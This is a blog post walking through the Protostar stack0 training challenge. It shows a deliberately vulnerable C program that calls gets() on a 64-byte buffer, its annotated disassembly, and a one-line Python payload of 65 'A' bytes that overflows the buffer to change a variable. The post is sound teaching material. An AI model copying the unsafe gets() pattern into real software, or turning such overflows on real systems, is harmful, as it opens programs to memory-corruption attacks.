DEV Community

loading...
Cover image for Stack overflow rules (protostar - stack0)

Stack overflow rules (protostar - stack0)

hextrace profile image hextrace ・2 min read

Let's discover stack-based buffer overflows with the first Protostar challenge: stack0.

Here is the vulnerable C code:

#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>

int main(int argc, char **argv)
{
  volatile int modified;
  char buffer[64];

  modified = 0;
  gets(buffer);

  if(modified != 0) {
      printf("you have changed the 'modified' variable\n");
  } else {
      printf("Try again?\n");
  }
}
Enter fullscreen mode Exit fullscreen mode

stack0 static analysis

File infos:

stack0: setuid ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.18, not stripped
Enter fullscreen mode Exit fullscreen mode

Let's take a look at our binary using objdump -Mintel -j.text -D stack0:

 80483f4:       55                      push   ebp
 80483f5:       89 e5                   mov    ebp,esp
 80483f7:       83 e4 f0                and    esp,0xfffffff0
 80483fa:       83 ec 60                sub    esp,0x60                   ; 60h / 96d

 80483fd:       c7 44 24 5c 00 00 00    mov    DWORD PTR [esp+0x5c],0x0   ; 4 bytes reserved, typically an local int variable ('modified')
 8048404:       00
 8048405:       8d 44 24 1c             lea    eax,[esp+0x1c]             ; 68 - 4 bytes reserved
 8048409:       89 04 24                mov    DWORD PTR [esp],eax
 804840c:       e8 fb fe ff ff          call   804830c <gets@plt>

 8048411:       8b 44 24 5c             mov    eax,DWORD PTR [esp+0x5c]
 8048415:       85 c0                   test   eax,eax                    ; 'modified' == 0x00 ?
 8048417:       74 0e                   je     8048427 <main+0x33>

 8048419:       c7 04 24 00 85 04 08    mov    DWORD PTR [esp],0x8048500  ; you have changed the 'modified' variable\0
 8048420:       e8 07 ff ff ff          call   804832c <puts@plt>
 8048425:       eb 0c                   jmp    8048433 <main+0x3f>        ; leave

 8048427:       c7 04 24 29 85 04 08    mov    DWORD PTR [esp],0x8048529  ; Try again?\0
 804842e:       e8 f9 fe ff ff          call   804832c <puts@plt>

 8048433:       c9                      leave                             ; leave
 8048434:       c3                      ret
Enter fullscreen mode Exit fullscreen mode

0x8048500 and 0x8048529 are next to each other. A string in the binary is 0x29 bytes long and another string follows plus their offset matches (0x500). Let's annotate them in our output.

The bug / vulnerability resides in the usage of unsecure gets function. Here is what the manual has to say about this function:

gets() reads a line from stdin into the buffer pointed to by s until either a terminating newline or EOF, which it replaces with '\0'.
No  check  for buffer overrun is performed (see BUGS below).
Enter fullscreen mode Exit fullscreen mode

And in the BUGS section:

Never  use  gets(). [...] it is extremely dangerous to use.  It has been used to break computer security.
Use fgets() instead.
Enter fullscreen mode Exit fullscreen mode

Breaking computer security right? Sounds fun. Let's perform that buffer overflow on our program.

We'll have to fill at least 64 bytes in our buffer to overflow it so we can modify the desired variable and pass the test.
Our payload uses 65 As bytes because we're sending a \n at the end and gets replaces that \n by a \0 which invalidates the test. 64 (+\n) would such not be sufficient.

root@protostar:/opt/protostar/bin# python -c 'print "A"*64' | ./stack0 # modified is still 0 here
Try again?
root@protostar:/opt/protostar/bin# python -c 'print "A"*64' | xxd | tail -n1
0000040: 0a                                       .
root@protostar:/opt/protostar/bin# python -c 'print "A"*65' | ./stack0
you have changed the 'modified' variable
Enter fullscreen mode Exit fullscreen mode

Links

Have fun!

Discussion (1)

pic
Editor guide
Collapse
hextrace profile image
hextrace Author • Edited

Give the protostar series a try, it's easy to setup and you'll learn a hell of a lot!
There is more to come about this, hit that follow button!